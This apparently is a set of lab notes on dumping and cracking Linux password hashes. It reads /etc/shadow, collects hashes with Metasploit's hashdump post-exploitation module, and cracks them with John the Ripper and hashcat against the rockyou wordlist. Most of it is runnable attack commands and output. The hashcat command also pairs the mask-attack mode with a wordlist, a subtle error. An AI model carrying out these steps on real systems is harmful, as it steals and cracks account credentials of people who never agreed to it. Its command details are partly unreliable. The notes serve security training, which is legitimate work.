Linux Hash Cracking

#Dumping Hashes

cat /etc/shadow

📌 root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.

• $6 = the hashing algorithm is SHA-512

• An MSF module can be used for hash dumping

# CTRL+Z to background the session
sessions -u 1
session 2

use post/linux/gather/hashdump
set SESSION 2
run

cat /root/.msf4/loot/20230429153134_default_192.22.107.3_linux.hashes_083080.txt
	root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash

• Exit MSFconsole

#Cracking Hashes

• Metasploit auxiliary/analyze/crack_linux module can be used to brute-force the hashes. Check the technique in the same 🔬lab environment.

#JohnTheRipper

• In this case John The Ripper will be used as an example

gzip -d /usr/share/wordlists/rockyou.txt.gz

john --format=sha512crypt /root/.msf4/loot/20230429153134_default_192.22.107.3_linux.hashes_083080.txt --wordlist=/usr/share/wordlists/rockyou.txt

#Hashcat

hashcat --help | grep 1800
	1800 | sha512crypt $6$, SHA512 (Unix) | Operating Systems

hashcat -a 3 -m 1800 /root/.msf4/loot/20230429153134_default_192.22.107.3_linux.hashes_083080.txt /usr/share/wordlists/rockyou.txt